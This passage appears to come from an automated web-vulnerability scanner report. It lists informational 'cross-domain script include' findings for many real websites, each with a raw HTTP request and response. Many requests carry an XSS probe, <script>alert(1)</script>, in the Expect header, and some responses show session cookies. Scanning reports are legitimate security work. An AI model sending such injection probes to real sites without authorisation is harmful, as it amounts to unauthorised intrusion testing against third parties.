Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Mon, 02 May 2011 02:12:54 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:14:04 GMT
Content-Length: 10437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

24.12. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.13. http://www.apartmentsmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentsmart.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentsmart.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=BH_8beo-zAEkAAAAMGYxMjg0NDItOTdmNy00NzVjLTlhNzItNjY2YjY5MzU4ZGYy0; expires=Sun, 10-Jul-2011 10:16:27 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:27 GMT
Content-Length: 23072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head">
<!--**********************************************************************************-->
<!-- D
...[SNIP]...
<link rel="SHORTCUT ICON" href="/Portals/1/favicon.ico" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

24.14. http://www.bluesplayer.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluesplayer.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:49 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b7c32b2936f1354d9728de7d69c9cd94; path=/
Set-Cookie: filter=include; path=/
Set-Cookie: ctemplate=default; path=/
Set-Cookie: ctheme=dark-tube; path=/
Content-Type: text/html
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</script>
<script language="JavaScript" src="http://j.maxmind.com/app/country.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAjXmqKfpfzVw1zDgAulCjwhQv9s9k3vjdF3VnVffIVuZr3td7GBRTxuB90LGKAhbSGhxoJYCYQ5Fomw">
</script>
...[SNIP]...
<div style="position: absolute; margin-top: 96px; margin-left: 95px; height: 15px; width: 75px; padding-left: 10px; padding-top: 4px;">
<script type="text/javascript" src="http://widgets.amung.us/small.js"></script>
...[SNIP]...

24.15. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
</h1>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ" type="text/javascript"></script>
...[SNIP]...

24.16. http://www.clickinks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clickinks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:49:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2jo5f13os0ec3z2tqss0vx1o; path=/; HttpOnly
Set-Cookie: OEM=; expires=Tue, 01-May-2001 23:49:24 GMT; path=/
Set-Cookie: MachineToken=676c3038-3d1e-4a84-ba81-895ddded8034; expires=Thu, 01-May-2031 07:00:00 GMT; path=/
Set-Cookie: phiddenId=ccd47da2-cd93-4362-834c-c48883e55ec6; expires=Tue, 03-May-2011 07:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Clickinks
...[SNIP]...
</a>
                   <script src="//upfront.thefind.com/scripts/main/utils-init-ajaxlib/upfront-badgeinit.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language='javascript' src='http://server.iad.liveperson.net/hc/92074166/x.js?cmd=file&file=chatScript3&site=92074166&&imageUrl=http://www.clickinks.com/images/VerticalNavigation/'></script>
...[SNIP]...

24.17. http://www.coolquiz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolquiz.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolquiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:35:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
Page-Completion-Status: Normal


                                                                       <html>
   <head><title>Page Not Found</title>
   </head>
   <style>
   
   body {background-color: FFFFFF;}
   .bg0 {padding:0p
...[SNIP]...
</table>

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

24.18. http://www.crankyape.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

24.19. http://www.crankyape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crankyape.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 999 No Hacking
Server: WebKnight/2.1
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 2420
Pragma: no-cache
Cache-control: no-cache
Expires: Sun, 01 May 2011 23:41:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

24.20. https://www.crankyape.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

24.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

24.22. http://www.febreze.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.febreze.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.febreze.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:22:53 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

24.23. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

24.24. http://www.greenhulk.net/forums/register.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

24.25. http://www.greenhulk.net/forums/showthread.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

24.26. http://www.herematures.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herematures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8844
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:02:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Matures Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

24.27. http://www.heresquirt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8750
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:48:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Pictures</title>
<!--
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

24.28. http://www.herestuds.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herestuds.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8762
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:13:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Studs Movies</title>
<!-- SR
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

24.29. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
